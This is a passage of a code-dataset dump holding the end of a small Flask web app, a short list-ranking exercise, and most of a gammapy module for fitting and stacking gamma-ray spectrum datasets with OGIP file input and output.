'good'\n\n\n@app.route('/results')\ndef results():\n # set the file_urls and remove the session variable\n file_url = session['file_urls']\n a.create_sample(file_url)\n a.create_list()\n return render_template('basic.html', file_url=file_url, Distance = b)\n\n\n@app.route('/start')\ndef start():\n sql_obj.open(\"model/mark.db\")\n b.set_graph()\n sql_obj.obj_list = []\n for i in a.pathlist:\n sql_obj.obj_list.append(sql_obj.find(i))\n return render_template('basic.html', file_url=session['file_urls'], Distance= b, sql_obj=sql_obj.obj_list, turi = a.distance_list)\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"20016901","text":"a = list(map(int, input().split()))\nn = int(input())\nif n > a[0]:\n print(1)\nelse:\n for i in range(len(a) - 1):\n if a[i] >= n > a[i + 1]:\n print(i + 2)\n break\n else:\n print(len(a) + 1)\n","sub_path":"22_5.py","file_name":"22_5.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"351897260","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\nfrom collections import OrderedDict\nfrom pathlib import Path\nimport numpy as np\nfrom astropy import units as u\nfrom astropy.io import fits\nfrom astropy.table import Table\nfrom gammapy.data import ObservationStats\nfrom gammapy.irf import EffectiveAreaTable, EnergyDispersion, IRFStacker\nfrom gammapy.stats import cash, wstat\nfrom gammapy.utils.fits import energy_axis_to_ebounds\nfrom gammapy.utils.fitting import Dataset, Parameters\nfrom gammapy.utils.random import get_random_state\nfrom gammapy.utils.scripts import make_path\nfrom .core import CountsSpectrum\nfrom .utils import SpectrumEvaluator\n\n__all__ = [\"SpectrumDatasetOnOff\", \"SpectrumDataset\", \"SpectrumDatasetOnOffStacker\"]\n\n\nclass SpectrumDataset(Dataset):\n \"\"\"Spectrum dataset for likelihood fitting.\n\n The spectrum dataset bundles reduced counts data, with a spectral model,\n background model and instrument response function to compute the fit-statistic\n given the current model and data.\n\n Parameters\n ----------\n model : `~gammapy.spectrum.models.SpectralModel`\n Fit model\n counts : `~gammapy.spectrum.CountsSpectrum`\n Counts spectrum\n livetime : `~astropy.units.Quantity`\n Livetime\n aeff : `~gammapy.irf.EffectiveAreaTable`\n Effective area\n edisp : `~gammapy.irf.EnergyDispersion`\n Energy dispersion\n background : `~gammapy.spectrum.CountsSpectrum`\n Background to use for the fit.\n mask_safe : `~numpy.ndarray`\n Mask defining the safe data range.\n mask_fit : `~numpy.ndarray`\n Mask to apply to the likelihood for fitting.\n obs_id : int or list of int\n Observation id(s) corresponding to the (stacked) dataset.\n gti : '~gammapy.data.gti.GTI'\n GTI of the observation or union of GTI if it is a stacked observation\n\n See Also\n --------\n SpectrumDatasetOnOff, FluxPointsDataset, MapDataset\n\n \"\"\"\n\n likelihood_type = \"cash\"\n\n def __init__(\n self,\n model=None,\n counts=None,\n livetime=None,\n aeff=None,\n edisp=None,\n background=None,\n mask_safe=None,\n mask_fit=None,\n obs_id=None,\n gti=None,\n ):\n if mask_fit is not None and mask_fit.dtype != np.dtype(\"bool\"):\n raise ValueError(\"mask data must have dtype bool\")\n\n self.counts = counts\n\n if livetime is not None:\n livetime = u.Quantity(livetime)\n\n 
self.livetime = livetime\n self.mask_fit = mask_fit\n self.aeff = aeff\n self.edisp = edisp\n self.background = background\n self.model = model\n self.mask_safe = mask_safe\n self.obs_id = obs_id\n self.gti = gti\n\n def __repr__(self):\n str_ = self.__class__.__name__\n return str_\n\n def __str__(self):\n str_ = self.__class__.__name__\n str_ += \"\\n\\n\"\n counts = np.nan\n if self.counts is not None:\n counts = np.sum(self.counts.data)\n str_ += \"\\t{:32}: {:.0f} \\n\".format(\"Total counts\", counts)\n\n npred = np.nan\n if self.model is not None:\n npred = np.sum(self.npred().data)\n str_ += \"\\t{:32}: {:.2f}\\n\".format(\"Total predicted counts\", npred)\n\n counts_off = np.nan\n if getattr(self, \"counts_off\", None) is not None:\n counts_off = np.sum(self.counts_off.data)\n str_ += \"\\t{:32}: {:.2f}\\n\\n\".format(\"Total off counts\", counts_off)\n\n aeff_min, aeff_max, aeff_unit = np.nan, np.nan, \"\"\n if self.aeff is not None:\n aeff_min = np.min(self.aeff.data.data.value[self.aeff.data.data.value > 0])\n aeff_max = np.max(self.aeff.data.data.value)\n aeff_unit = self.aeff.data.data.unit\n\n str_ += \"\\t{:32}: {:.2e} {}\\n\".format(\"Effective area min\", aeff_min, aeff_unit)\n str_ += \"\\t{:32}: {:.2e} {}\\n\\n\".format(\n \"Effective area max\", aeff_max, aeff_unit\n )\n\n livetime = np.nan\n if self.livetime is not None:\n livetime = self.livetime\n str_ += \"\\t{:32}: {:.2e}\\n\\n\".format(\"Livetime\", livetime)\n\n # data section\n n_bins = 0\n if self.counts is not None:\n n_bins = self.counts.data.size\n str_ += \"\\t{:32}: {} \\n\".format(\"Number of total bins\", n_bins)\n\n n_fit_bins = 0\n if self.mask is not None:\n n_fit_bins = np.sum(self.mask)\n str_ += \"\\t{:32}: {} \\n\\n\".format(\"Number of fit bins\", n_fit_bins)\n\n # likelihood section\n str_ += \"\\t{:32}: {}\\n\".format(\"Fit statistic type\", self.likelihood_type)\n\n stat = np.nan\n if self.model is not None:\n stat = self.likelihood()\n str_ += \"\\t{:32}: {:.2f}\\n\\n\".format(\"Fit statistic value (-2 log(L))\", stat)\n\n n_pars, n_free_pars = 0, 0\n if self.model is not None:\n n_pars = len(self.model.parameters.parameters)\n n_free_pars = len(self.parameters.free_parameters)\n\n str_ += \"\\t{:32}: {}\\n\".format(\"Number of parameters\", n_pars)\n str_ += \"\\t{:32}: {}\\n\\n\".format(\"Number of free parameters\", n_free_pars)\n\n if self.model is not None:\n str_ += \"\\t{:32}: {}\\n\".format(\"Model type\", self.model.__class__.__name__)\n info = str(self.model.parameters)\n lines = info.split(\"\\n\")\n for line in lines[2:-1]:\n str_ += \"\\t\" + line.replace(\":\", \"\\t:\") + \"\\n\"\n\n return str_.expandtabs(tabsize=4)\n\n @property\n def model(self):\n return self._model\n\n @model.setter\n def model(self, model):\n self._model = model\n if model is not None:\n self._parameters = Parameters(self._model.parameters.parameters)\n self._predictor = SpectrumEvaluator(\n model=self.model,\n livetime=self.livetime,\n aeff=self.aeff,\n e_true=self._energy_axis.edges,\n edisp=self.edisp,\n )\n else:\n self._parameters = None\n self._predictor = None\n\n @property\n def parameters(self):\n if self._parameters is None:\n raise AttributeError(\"No model set for Dataset\")\n else:\n return self._parameters\n\n @property\n def _energy_axis(self):\n if self.counts is not None:\n e_axis = self.counts.energy\n elif self.edisp is not None:\n e_axis = self.edisp.data.axis(\"e_reco\")\n elif self.aeff is not None:\n # assume e_reco = e_true\n e_axis = self.aeff.data.axis(\"energy\")\n return 
e_axis\n\n @property\n def data_shape(self):\n \"\"\"Shape of the counts data\"\"\"\n return (self._energy_axis.nbin,)\n\n def npred(self):\n \"\"\"Returns npred map (model + background)\"\"\"\n if self._predictor is None:\n raise AttributeError(\"No model set for Dataset\")\n npred = self._predictor.compute_npred()\n if self.background:\n npred.data += self.background.data\n return npred\n\n def likelihood_per_bin(self):\n \"\"\"Likelihood per bin given the current model parameters\"\"\"\n return cash(n_on=self.counts.data, mu_on=self.npred().data)\n\n def _as_counts_spectrum(self, data):\n energy = self.counts.energy.edges\n return CountsSpectrum(data=data, energy_lo=energy[:-1], energy_hi=energy[1:])\n\n @property\n def excess(self):\n \"\"\"Excess (counts - alpha * counts_off)\"\"\"\n excess = self.counts.data - self.background.data\n return self._as_counts_spectrum(excess)\n\n def fake(self, random_state=\"random-seed\"):\n \"\"\"Simulate fake counts for the current model and reduced irfs.\n\n This method overwrites the counts defined on the dataset object.\n\n Parameters\n ----------\n random_state : {int, 'random-seed', 'global-rng', `~numpy.random.RandomState`}\n Defines random number generator initialisation.\n Passed to `~gammapy.utils.random.get_random_state`.\n \"\"\"\n random_state = get_random_state(random_state)\n npred = self.npred()\n npred.data = random_state.poisson(npred.data)\n self.counts = npred\n\n @property\n def energy_range(self):\n \"\"\"Energy range defined by the safe mask\"\"\"\n energy = self.counts.energy.edges\n e_lo = energy[:-1][self.mask_safe]\n e_hi = energy[1:][self.mask_safe]\n return u.Quantity([e_lo.min(), e_hi.max()])\n\n def plot_fit(self):\n \"\"\"Plot counts and residuals in two panels.\n\n Calls ``plot_counts`` and ``plot_residuals``.\n \"\"\"\n from matplotlib.gridspec import GridSpec\n import matplotlib.pyplot as plt\n\n gs = GridSpec(7, 1)\n\n ax_spectrum = plt.subplot(gs[:5, :])\n self.plot_counts(ax=ax_spectrum)\n\n ax_spectrum.set_xticks([])\n\n ax_residuals = plt.subplot(gs[5:, :])\n self.plot_residuals(ax=ax_residuals)\n return ax_spectrum, ax_residuals\n\n @property\n def _e_unit(self):\n return self.counts.energy.unit\n\n def plot_counts(self, ax=None):\n \"\"\"Plot predicted and detected counts.\n\n Parameters\n ----------\n ax : `~matplotlib.pyplot.Axes`\n Axes object.\n\n Returns\n -------\n ax : `~matplotlib.pyplot.Axes`\n Axes object.\n \"\"\"\n import matplotlib.pyplot as plt\n\n ax = plt.gca() if ax is None else ax\n\n self.npred().plot(ax=ax, label=\"mu_src\", energy_unit=self._e_unit)\n self.excess.plot(ax=ax, label=\"Excess\", fmt=\".\", energy_unit=self._e_unit)\n\n e_min, e_max = self.energy_range\n kwargs = {\"color\": \"black\", \"linestyle\": \"dashed\"}\n ax.axvline(e_min.to_value(self._e_unit), label=\"fit range\", **kwargs)\n ax.axvline(e_max.to_value(self._e_unit), **kwargs)\n\n ax.legend(numpoints=1)\n ax.set_title(\"\")\n return ax\n\n def residuals(self, method=\"diff\"):\n \"\"\"Compute the spectral residuals.\n\n Parameters\n ----------\n method: {\"diff\", \"diff/model\", \"diff/sqrt(model)\"}\n Method used to compute the residuals. 
Available options are:\n - `diff` (default): data - model\n - `diff/model`: (data - model) / model\n - `diff/sqrt(model)`: (data - model) / sqrt(model)\n\n Returns\n -------\n residuals : `CountsSpectrum`\n Residual spectrum.\n \"\"\"\n\n residuals = self._compute_residuals(self.counts, self.npred(), method)\n return residuals\n\n def plot_residuals(self, method=\"diff\", ax=None, **kwargs):\n \"\"\"Plot residuals.\n\n Parameters\n ----------\n ax : `~matplotlib.pyplot.Axes`\n Axes object.\n method : {\"diff\", \"diff/model\", \"diff/sqrt(model)\"}\n Normalization used to compute the residuals, see `SpectrumDataset.residuals()`\n **kwargs : dict\n Keywords passed to `CountsSpectrum.plot()`\n\n Returns\n -------\n ax : `~matplotlib.pyplot.Axes`\n Axes object.\n \"\"\"\n import matplotlib.pyplot as plt\n\n ax = plt.gca() if ax is None else ax\n\n residuals = self.residuals(method=method)\n label = self._residuals_labels[method]\n\n residuals.plot(\n ax=ax, ecolor=\"black\", fmt=\"none\", energy_unit=self._e_unit, **kwargs\n )\n ax.axhline(0, color=\"black\", lw=0.5)\n\n ymax = 1.2 * np.nanmax(residuals.data)\n ax.set_ylim(-ymax, ymax)\n\n ax.set_xlabel(\"Energy [{}]\".format(self._e_unit))\n ax.set_ylabel(\"Residuals ({})\".format(label))\n return ax\n\n\nclass SpectrumDatasetOnOff(SpectrumDataset):\n \"\"\"Spectrum dataset for on-off likelihood fitting.\n\n The on-off spectrum dataset bundles reduced counts data, off counts data,\n with a spectral model, relative background efficiency and instrument\n response functions to compute the fit-statistic given the current model\n and data.\n\n Parameters\n ----------\n model : `~gammapy.spectrum.models.SpectralModel`\n Fit model\n counts : `~gammapy.spectrum.CountsSpectrum`\n ON Counts spectrum\n counts_off : `~gammapy.spectrum.CountsSpectrum`\n OFF Counts spectrum\n livetime : `~astropy.units.Quantity`\n Livetime\n aeff : `~gammapy.irf.EffectiveAreaTable`\n Effective area\n edisp : `~gammapy.irf.EnergyDispersion`\n Energy dispersion\n mask_safe : `~numpy.array`\n Mask defining the safe data range.\n mask_fit : `~numpy.array`\n Mask to apply to the likelihood for fitting.\n acceptance : `~numpy.array` or float\n Relative background efficiency in the on region.\n acceptance_off : `~numpy.array` or float\n Relative background efficiency in the off region.\n obs_id : int or list of int\n Observation id(s) corresponding to the (stacked) dataset.\n gti : '~gammapy.data.gti.GTI'\n GTI of the observation or union of GTI if it is a stacked observation\n\n See Also\n --------\n SpectrumDataset, FluxPointsDataset, MapDataset\n\n \"\"\"\n\n likelihood_type = \"wstat\"\n\n def __init__(\n self,\n model=None,\n counts=None,\n counts_off=None,\n livetime=None,\n aeff=None,\n edisp=None,\n mask_safe=None,\n mask_fit=None,\n acceptance=None,\n acceptance_off=None,\n obs_id=None,\n gti=None,\n ):\n\n self.counts = counts\n self.counts_off = counts_off\n\n if livetime is not None:\n livetime = u.Quantity(livetime)\n\n self.livetime = livetime\n self.mask_fit = mask_fit\n self.aeff = aeff\n self.edisp = edisp\n self.model = model\n self.mask_safe = mask_safe\n\n if np.isscalar(acceptance):\n acceptance = np.ones(self.data_shape) * acceptance\n\n if np.isscalar(acceptance_off):\n acceptance_off = np.ones(self.data_shape) * acceptance_off\n\n self.acceptance = acceptance\n self.acceptance_off = acceptance_off\n self.obs_id = obs_id\n self.gti = gti\n\n def __repr__(self):\n str_ = self.__class__.__name__\n return str_\n\n def __str__(self):\n str_ = 
super().__str__()\n\n acceptance = np.nan\n if self.acceptance is not None:\n acceptance = np.mean(self.acceptance)\n\n str_ += \"\\t{:32}: {}\\n\".format(\"Acceptance mean:\", acceptance)\n return str_.expandtabs(tabsize=4)\n\n @property\n def background(self):\n \"\"\"\"\"\"\n background = self.alpha * self.counts_off.data\n return self._as_counts_spectrum(background)\n\n @property\n def alpha(self):\n \"\"\"Exposure ratio between signal and background regions\"\"\"\n return self.acceptance / self.acceptance_off\n\n def npred_sig(self):\n \"\"\"Predicted counts from source model (`CountsSpectrum`).\"\"\"\n if self._predictor is None:\n raise AttributeError(\"No model set for this Dataset\")\n npred = self._predictor.compute_npred()\n return npred\n\n def likelihood_per_bin(self):\n \"\"\"Likelihood per bin given the current model parameters\"\"\"\n mu_sig = self.npred_sig().data\n on_stat_ = wstat(\n n_on=self.counts.data,\n n_off=self.counts_off.data,\n alpha=self.alpha,\n mu_sig=mu_sig,\n )\n return np.nan_to_num(on_stat_)\n\n def fake(self, background_model, random_state=\"random-seed\"):\n \"\"\"Simulate fake counts for the current model and reduced irfs.\n\n This method overwrites the counts and off counts defined on the dataset object.\n\n\n Parameters\n ----------\n background_model : `~gammapy.spectrum.CountsSpectrum`\n BackgroundModel. In the future will be part of the SpectrumDataset Class.\n For the moment, a CountSpectrum.\n random_state : {int, 'random-seed', 'global-rng', `~numpy.random.RandomState`}\n Defines random number generator initialisation.\n Passed to `~gammapy.utils.random.get_random_state`.\n \"\"\"\n random_state = get_random_state(random_state)\n\n npred_sig = self.npred_sig()\n npred_sig.data = random_state.poisson(npred_sig.data)\n\n npred_bkg = background_model.copy()\n npred_bkg.data = random_state.poisson(npred_bkg.data)\n\n self.counts = npred_sig + npred_bkg\n\n npred_off = background_model / self.alpha\n npred_off.data = random_state.poisson(npred_off.data)\n self.counts_off = npred_off\n\n @classmethod\n def read(cls, filename):\n \"\"\"Read from file\n\n For now, filename is assumed to the name of a PHA file where BKG file, ARF, and RMF names\n must be set in the PHA header and be present in the same folder\n\n Parameters\n ----------\n filename : str\n OGIP PHA file to read\n \"\"\"\n raise NotImplementedError(\n \"To read from an OGIP fits file use SpectrumDatasetOnOff.from_ogip_files.\"\n )\n\n def peek(self, figsize=(10, 10)):\n \"\"\"Quick-look summary plots.\"\"\"\n import matplotlib.pyplot as plt\n\n e_min, e_max = self.energy_range\n\n fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(nrows=2, ncols=2, figsize=figsize)\n\n ax1.set_title(\"Counts\")\n energy_unit = \"TeV\"\n\n if self.counts_off is not None:\n self.background.plot_hist(\n ax=ax1, label=\"alpha * n_off\", color=\"darkblue\", energy_unit=energy_unit\n )\n\n self.counts.plot_hist(\n ax=ax1,\n label=\"n_on\",\n color=\"darkred\",\n energy_unit=energy_unit,\n show_energy=(e_min, e_max),\n )\n\n ax1.set_xlim(\n 0.7 * e_min.to_value(energy_unit), 1.3 * e_max.to_value(energy_unit)\n )\n ax1.legend(numpoints=1)\n\n ax2.set_title(\"Effective Area\")\n e_unit = self.aeff.energy.unit\n self.aeff.plot(ax=ax2, show_energy=(e_min, e_max))\n ax2.set_xlim(0.7 * e_min.to_value(e_unit), 1.3 * e_max.to_value(e_unit))\n\n ax3.axis(\"off\")\n\n if self.counts_off is not None:\n stats = ObservationStats(**self._info_dict(in_safe_energy_range=True))\n ax3.text(0, 0.2, \"{}\".format(stats), 
fontsize=12)\n\n ax4.set_title(\"Energy Dispersion\")\n if self.edisp is not None:\n self.edisp.plot_matrix(ax=ax4)\n\n # TODO: optimize layout\n plt.subplots_adjust(wspace=0.3)\n\n def to_ogip_files(self, outdir=None, use_sherpa=False, overwrite=False):\n \"\"\"Write OGIP files.\n\n If you want to use the written files with Sherpa you have to set the\n ``use_sherpa`` flag. Then all files will be written in units 'keV' and\n 'cm2'.\n\n Parameters\n ----------\n outdir : `pathlib.Path`\n output directory, default: pwd\n use_sherpa : bool, optional\n Write Sherpa compliant files, default: False\n overwrite : bool\n Overwrite existing files?\n \"\"\"\n # TODO: refactor and reduce amount of code duplication\n outdir = Path.cwd() if outdir is None else make_path(outdir)\n outdir.mkdir(exist_ok=True, parents=True)\n\n if isinstance(self.obs_id, list):\n phafile = \"pha_stacked.fits\"\n else:\n phafile = \"pha_obs{}.fits\".format(self.obs_id)\n\n bkgfile = phafile.replace(\"pha\", \"bkg\")\n arffile = phafile.replace(\"pha\", \"arf\")\n rmffile = phafile.replace(\"pha\", \"rmf\")\n\n counts_table = self.counts.to_table()\n counts_table[\"QUALITY\"] = np.logical_not(self.mask_safe)\n counts_table[\"BACKSCAL\"] = self.acceptance\n counts_table[\"AREASCAL\"] = np.ones(self.acceptance.size)\n meta = self._ogip_meta()\n\n meta[\"respfile\"] = rmffile\n meta[\"backfile\"] = bkgfile\n meta[\"ancrfile\"] = arffile\n meta[\"hduclas2\"] = \"TOTAL\"\n counts_table.meta = meta\n\n name = counts_table.meta[\"name\"]\n hdu = fits.BinTableHDU(counts_table, name=name)\n hdulist = fits.HDUList([fits.PrimaryHDU(), hdu, self._ebounds_hdu(use_sherpa)])\n\n hdulist.writeto(str(outdir / phafile), overwrite=overwrite)\n\n self.aeff.write(outdir / arffile, overwrite=overwrite, use_sherpa=use_sherpa)\n\n if self.counts_off is not None:\n counts_off_table = self.counts_off.to_table()\n counts_off_table[\"QUALITY\"] = np.logical_not(self.mask_safe)\n counts_off_table[\"BACKSCAL\"] = self.acceptance_off\n counts_off_table[\"AREASCAL\"] = np.ones(self.acceptance.size)\n meta = self._ogip_meta()\n meta[\"hduclas2\"] = \"BKG\"\n\n counts_off_table.meta = meta\n name = counts_off_table.meta[\"name\"]\n hdu = fits.BinTableHDU(counts_off_table, name=name)\n hdulist = fits.HDUList(\n [fits.PrimaryHDU(), hdu, self._ebounds_hdu(use_sherpa)]\n )\n hdulist.writeto(str(outdir / bkgfile), overwrite=overwrite)\n\n if self.edisp is not None:\n self.edisp.write(\n str(outdir / rmffile), overwrite=overwrite, use_sherpa=use_sherpa\n )\n\n def _ebounds_hdu(self, use_sherpa):\n energy = self.counts.energy.edges\n\n if use_sherpa:\n energy = energy.to(\"keV\")\n\n return energy_axis_to_ebounds(energy)\n\n def _ogip_meta(self):\n \"\"\"Meta info for the OGIP data format\"\"\"\n meta = OrderedDict()\n meta[\"name\"] = \"SPECTRUM\"\n meta[\"hduclass\"] = \"OGIP\"\n meta[\"hduclas1\"] = \"SPECTRUM\"\n meta[\"corrscal\"] = \"\"\n meta[\"chantype\"] = \"PHA\"\n meta[\"detchans\"] = self.counts.energy.nbin\n meta[\"filter\"] = \"None\"\n meta[\"corrfile\"] = \"\"\n meta[\"poisserr\"] = True\n meta[\"hduclas3\"] = \"COUNT\"\n meta[\"hduclas4\"] = \"TYPE:1\"\n meta[\"lo_thres\"] = self.energy_range[0].to_value(\"TeV\")\n meta[\"hi_thres\"] = self.energy_range[1].to_value(\"TeV\")\n meta[\"exposure\"] = self.livetime.to_value(\"s\")\n meta[\"obs_id\"] = self.obs_id\n return meta\n\n @classmethod\n def from_ogip_files(cls, filename):\n \"\"\"Read `~gammapy.spectrum.SpectrumDatasetOnOff` from OGIP files.\n\n BKG file, ARF, and RMF must be set in the PHA 
header and be present in\n the same folder.\n\n Parameters\n ----------\n filename : str\n OGIP PHA file to read\n \"\"\"\n filename = make_path(filename)\n dirname = filename.parent\n\n with fits.open(str(filename), memmap=False) as hdulist:\n data = _read_ogip_hdulist(hdulist)\n\n counts = CountsSpectrum(\n energy_hi=data[\"energy_hi\"], energy_lo=data[\"energy_lo\"], data=data[\"data\"]\n )\n\n phafile = filename.name\n\n try:\n rmffile = phafile.replace(\"pha\", \"rmf\")\n energy_dispersion = EnergyDispersion.read(str(dirname / rmffile))\n except IOError:\n # TODO : Add logger and echo warning\n energy_dispersion = None\n\n try:\n bkgfile = phafile.replace(\"pha\", \"bkg\")\n filename = str(dirname / bkgfile)\n\n with fits.open(str(filename), memmap=False) as hdulist:\n data_bkg = _read_ogip_hdulist(hdulist)\n counts_off = CountsSpectrum(\n energy_hi=data_bkg[\"energy_hi\"],\n energy_lo=data_bkg[\"energy_lo\"],\n data=data_bkg[\"data\"],\n )\n\n acceptance_off = data_bkg[\"backscal\"]\n except IOError:\n # TODO : Add logger and echo warning\n counts_off, acceptance_off = None, None\n\n arffile = phafile.replace(\"pha\", \"arf\")\n aeff = EffectiveAreaTable.read(str(dirname / arffile))\n\n mask_safe = np.logical_not(data[\"quality\"])\n\n return cls(\n counts=counts,\n aeff=aeff,\n counts_off=counts_off,\n edisp=energy_dispersion,\n livetime=data[\"livetime\"],\n mask_safe=mask_safe,\n acceptance=data[\"backscal\"],\n acceptance_off=acceptance_off,\n obs_id=data[\"obs_id\"],\n )\n\n # TODO: decide on a design for dataset info tables / dicts and make it part\n # of the public API\n def _info_dict(self, in_safe_energy_range=False):\n \"\"\"Info dict\"\"\"\n info = dict()\n mask = self.mask_safe if in_safe_energy_range else slice(None)\n\n # TODO: handle energy dependent a_on / a_off\n info[\"a_on\"] = self.acceptance[0]\n info[\"n_on\"] = self.counts.data[mask].sum()\n\n if self.counts_off is not None:\n info[\"n_off\"] = self.counts_off.data[mask].sum()\n info[\"a_off\"] = self.acceptance_off[0]\n else:\n info[\"n_off\"] = 0\n info[\"a_off\"] = 1\n\n info[\"livetime\"] = self.livetime\n info[\"obs_id\"] = self.obs_id\n return info\n\n\ndef _read_ogip_hdulist(hdulist, hdu1=\"SPECTRUM\", hdu2=\"EBOUNDS\"):\n \"\"\"Create from `~astropy.io.fits.HDUList`.\"\"\"\n counts_table = Table.read(hdulist[hdu1])\n ebounds = Table.read(hdulist[hdu2])\n emin = ebounds[\"E_MIN\"].quantity\n emax = ebounds[\"E_MAX\"].quantity\n\n # Check if column are present in the header\n quality = None\n areascal = None\n backscal = None\n\n if \"QUALITY\" in counts_table.colnames:\n quality = counts_table[\"QUALITY\"].data\n if \"AREASCAL\" in counts_table.colnames:\n areascal = counts_table[\"AREASCAL\"].data\n if \"BACKSCAL\" in counts_table.colnames:\n backscal = counts_table[\"BACKSCAL\"].data\n\n return dict(\n data=counts_table[\"COUNTS\"],\n backscal=backscal,\n energy_lo=emin,\n energy_hi=emax,\n quality=quality,\n areascal=areascal,\n livetime=counts_table.meta[\"EXPOSURE\"] * u.s,\n obs_id=counts_table.meta[\"OBS_ID\"],\n is_bkg=False,\n )\n\n\nclass SpectrumDatasetOnOffStacker:\n r\"\"\"Stack a list of homogeneous datasets.\n\n The stacking of :math:`j` datasets is implemented as follows.\n :math:`k` and :math:`l` denote a bin in reconstructed and true energy,\n respectively.\n\n .. 
math::\n \\epsilon_{jk} =\\left\\{\\begin{array}{cl} 1, & \\mbox{if\n bin k is inside the energy thresholds}\\\\ 0, & \\mbox{otherwise} \\end{array}\\right.\n\n \\overline{\\mathrm{n_{on}}}_k = \\sum_{j} \\mathrm{n_{on}}_{jk} \\cdot\n \\epsilon_{jk}\n\n \\overline{\\mathrm{n_{off}}}_k = \\sum_{j} \\mathrm{n_{off}}_{jk} \\cdot\n \\epsilon_{jk}\n\n \\overline{\\alpha}_k =\n \\frac{\\overline{{b_{on}}}_k}{\\overline{{b_{off}}}_k}\n\n \\overline{{b}_{on}}_k = 1\n\n \\overline{{b}_{off}}_k = \\frac{1}{\\sum_{j}\\alpha_{jk} \\cdot\n \\mathrm{n_{off}}_{jk} \\cdot \\epsilon_{jk}} \\cdot \\overline{\\mathrm {n_{off}}}\n\n Please refer to the `~gammapy.irf.IRFStacker` for the description\n of how the IRFs are stacked.\n\n Parameters\n ----------\n obs_list : list of `~gammapy.spectrum.SpectrumDatasetOnOff`\n Observations to stack\n\n Examples\n --------\n >>> from gammapy.spectrum import SpectrumDatasetOnOff, SpectrumDatasetOnOffStacker\n >>> obs_ids = [23523, 23526, 23559, 23592]\n >>> datasets = []\n >>> for obs in obs_ids:\n >>> filename = \"$GAMMAPY_DATA/joint-crab/spectra/hess/pha_obs{}.fits\"\n >>> ds = SpectrumDatasetOnOff.from_ogip_files(filename.format(obs))\n >>> datasets.append(ds)\n >>> obs_stacker = SpectrumDatasetOnOffStacker(datasets)\n >>> stacked = obs_stacker.run()\n >>> print(stacked.livetime)\n 6313.8116406202325 s\n \"\"\"\n\n def __init__(self, obs_list):\n self.obs_list = obs_list\n self.stacked_on_vector = None\n self.stacked_off_vector = None\n self.stacked_aeff = None\n self.stacked_edisp = None\n self.stacked_bkscal_on = None\n self.stacked_bkscal_off = None\n self.stacked_obs = None\n self.stacked_gti = None\n\n def __str__(self):\n ss = self.__class__.__name__\n ss += \"\\n{}\".format(self.obs_list)\n return ss\n\n def run(self):\n \"\"\"Run all steps in the correct order.\"\"\"\n self.stack_counts_vectors()\n self.stack_aeff()\n self.stack_edisp()\n self.stack_gti()\n self.stack_obs()\n return self.stacked_obs\n\n def stack_counts_vectors(self):\n \"\"\"Stack on and off vectors.\"\"\"\n self.stack_on_vector()\n self.stack_off_vector()\n self.stack_backscal()\n self.setup_counts_vectors()\n\n def stack_on_vector(self):\n \"\"\"Stack the on count vector.\"\"\"\n on_vector_list = [o.counts for o in self.obs_list]\n self.stacked_on_vector = self.stack_counts_spectrum(on_vector_list)\n\n def stack_off_vector(self):\n \"\"\"Stack the off count vector.\"\"\"\n off_vector_list = [o.counts_off for o in self.obs_list]\n self.stacked_off_vector = self.stack_counts_spectrum(off_vector_list)\n\n def stack_counts_spectrum(self, counts_spectrum_list):\n \"\"\"Stack `~gammapy.spectrum.CountsSpectrum`.\n\n * Bins outside the safe energy range are set to 0\n * Attributes are set to None.\n * The quality vector of the observations are combined with a logical or,\n such that the low (high) threshold of the stacked obs is the minimum\n low (maximum high) threshold of the observation list to be stacked.\n \"\"\"\n template = counts_spectrum_list[0].copy()\n energy = template.energy\n stacked_data = np.zeros(energy.nbin)\n stacked_quality = np.ones(energy.nbin)\n for spec, obs in zip(counts_spectrum_list, self.obs_list):\n stacked_data[obs.mask_safe] += spec.data[obs.mask_safe]\n temp = np.logical_and(stacked_quality, ~obs.mask_safe)\n stacked_quality = np.array(temp, dtype=int)\n\n self.stacked_quality = stacked_quality\n return CountsSpectrum(\n data=stacked_data, energy_lo=energy.edges[:-1], energy_hi=energy.edges[1:]\n )\n\n def stack_backscal(self):\n \"\"\"Stack ``backscal`` for on and 
off vector.\"\"\"\n nbins = self.obs_list[0].counts.energy.nbin\n bkscal_on = np.ones(nbins)\n bkscal_off = np.zeros(nbins)\n\n alpha_sum = 0.0\n\n for obs in self.obs_list:\n bkscal_off[obs.mask_safe] += (obs.alpha * obs.counts_off.data)[\n obs.mask_safe\n ]\n alpha_sum += (obs.alpha * obs.counts_off.data)[obs.mask_safe].sum()\n\n with np.errstate(divide=\"ignore\", invalid=\"ignore\"):\n stacked_bkscal_off = self.stacked_off_vector.data / bkscal_off\n alpha_average = (\n alpha_sum / self.stacked_off_vector.data[obs.mask_safe].sum()\n )\n\n # there should be no nan values in backscal_on or backscal_off\n # this leads to problems when fitting the data\n # use 1 for backscale of on_vector and 1 / alpha_average for backscale of off_vector\n alpha_correction = 1\n idx = np.where(self.stacked_off_vector.data == 0)[0]\n bkscal_on[idx] = alpha_correction\n # For the bins where the stacked OFF counts equal 0, the alpha value is performed by weighting on the total\n # OFF counts of each run\n stacked_bkscal_off[idx] = alpha_correction / alpha_average\n\n self.stacked_bkscal_on = bkscal_on\n self.stacked_bkscal_off = stacked_bkscal_off\n\n def setup_counts_vectors(self):\n \"\"\"Add correct attributes to stacked counts vectors.\"\"\"\n livetimes = [obs.livetime.to_value(\"s\") for obs in self.obs_list]\n self.total_livetime = u.Quantity(np.sum(livetimes), \"s\")\n\n self.stacked_on_vector.livetime = self.total_livetime\n self.stacked_off_vector.livetime = self.total_livetime\n self.stacked_on_vector.backscal = self.stacked_bkscal_on\n self.stacked_off_vector.backscal = self.stacked_bkscal_off\n\n def stack_aeff(self):\n \"\"\"Stack effective areas (weighted by livetime).\n\n Calls `gammapy.irf.IRFStacker.stack_aeff`.\n \"\"\"\n irf_stacker = IRFStacker(\n list_aeff=[obs.aeff for obs in self.obs_list],\n list_livetime=[obs.livetime for obs in self.obs_list],\n )\n irf_stacker.stack_aeff()\n self.stacked_aeff = irf_stacker.stacked_aeff\n\n def stack_edisp(self):\n \"\"\"Stack energy dispersion (weighted by exposure).\n\n Calls `~gammapy.irf.IRFStacker.stack_edisp`\n \"\"\"\n irf_stacker = IRFStacker(\n 